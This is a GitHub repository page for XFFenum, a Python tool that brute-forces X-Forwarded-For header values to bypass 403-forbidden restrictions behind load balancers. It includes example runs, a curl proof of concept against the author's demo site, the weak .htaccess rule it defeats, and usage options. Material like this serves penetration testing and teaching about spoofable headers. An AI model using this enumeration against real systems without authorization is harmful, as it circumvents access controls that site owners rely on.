Skip to content
X-Forwarded-For [403 forbidden] enumeration
Python
Branch: master
Clone or download
vavkamil Create FUNDING.yml
BTC address: 1Hx7eLzzUyAqM6k8d8AVffCVYeFv7b2sw7
Latest commit f94e4f3 Aug 15, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.github Create FUNDING.yml Aug 15, 2019
README.md XFFenum v1.0 Aug 7, 2019
requirements.txt XFFenum v1.0 Aug 7, 2019
xffenum.py XFFenum v1.0 Aug 7, 2019

README.md

XFFenum

A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header

Based on the enumXFF by @infosec_au

Example

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108 

673it [00:34, 21.69it/s]

[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"

Proof of Concept

vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403 
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /xff
on this server.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80</address>
</body></html>
.htaccess
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess

Usage

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]

X-Forwarded-For [403 forbidden] enumeration

optional arguments:
  -h, --help       show this help message and exit
  -u URL           Forbidden URL patch to scan
  -i IP_RANGE      Signe IP or range to use
  -t THREADS       number of threads (default: 5)
  --no-verify-ssl  Ignore any and all SSL errors.

Have a nice day :)

References

https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html

You can’t perform that action at this time.